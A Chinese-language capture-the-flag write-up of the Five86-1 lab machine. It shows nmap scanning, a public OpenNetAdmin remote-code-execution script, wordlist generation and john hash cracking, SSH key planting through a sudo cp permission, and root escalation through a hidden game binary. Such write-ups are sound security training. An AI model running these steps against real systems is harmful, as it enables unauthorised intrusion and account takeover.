Five86-1靶机测试记录

时间:2022-10-06 19:01:00

靶机信息

下载地址:https://www.five86.com/five86-1.html 网络连接:NAT,kali和靶机为同一网段 下载好靶机解压后,直接运行文件夹里的.ova文件即可

信息搜集

使用nmap扫描同网段的信息,筛选出目标ip地址

nmap -sn 192.168.74.0/24

Five86-1靶机测试记录 对此ip做进一步的扫描

nmap -A 192.168.74.136

Five86-1靶机测试记录 浏览器访问该ip发现网页为空白界面 从扫描信息中的可以获得两个路径/robots.txt /ona Five86-1靶机测试记录Five86-1靶机测试记录

漏洞利用

OpenNetAdmin简称ona,是一款网络管理工具 在kali上搜索到两个该版本的漏洞,目标主机的ona版本为v18.1.1,可以进行利用 Five86-1靶机测试记录 这里使用的是RCE的漏洞 脚本文件路径:./usr/share/exploitdb/exploits/php/webapps/47691.sh 运行脚本文件,在后面跟上目标主机的ona路径即可利用漏洞

./47691.sh http://192.168.74.136/ona/

Five86-1靶机测试记录 进入目标主机后,发现无法使用cd命令,查找下有权限可以访问的文件 发现有几个var路径下的文件可以查看

find / -user www-data

Five86-1靶机测试记录 查看.htaccess文件后提示另外一个路径 再查看.htpasswd文件发现了一段hash,douglas应该为用户名 最后一行提示密码是由aefhrt组成长度为10的密码 Five86-1靶机测试记录 使用crunch生成由字母aefhr组成的10位密码组合到该txt文本当做字典

crunch 10 10 aefhrt -o /five86pass.txt

Five86-1靶机测试记录 将之前的hash写入到文档中,然后使用john进行暴破 five86pass.txt为生成的字典,hash.txt为获取到的密码hash 等个两三分钟就能跑出结果来,得到密码fatherrrrr,douglas/fatherrrrr

john --wordlist=/five86pass.txt /hash.txt

Five86-1靶机测试记录 试了下是ssh的账号密码,登录到ssh 发现cp命令可以用jen的身份免密执行

ssh -l douglas 192.168.74.136
sudo -l

Five86-1靶机测试记录 可以通过ssh密钥进行免密登录 ssh免密登录需要创建/authorized_keys目录,这里在tmp目录下创建,且最低需要600权限 使用jen用户来执行cp命令,将ssh公钥复制到jen家目录下,然后使用ssh公钥登录

cd ~
cp .ssh/id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
ssh -i id_rsa jen@192.168.74.136

Five86-1靶机测试记录 登录到jen账户后发现有邮件 查看邮件发现moss账户的密码为Fire!Fire!,登录到moss账户 Five86-1靶机测试记录 在moss的home目录中发现了一个隐藏文件夹.games 在.games文件夹里找到了一个可执行程序upyourgame,全输yes即可 完成问答后即可获取到root权限,然后在root目录下找到flag

cd /home/moss
ls -a
cd .games/
./upyourgame 

Five86-1靶机测试记录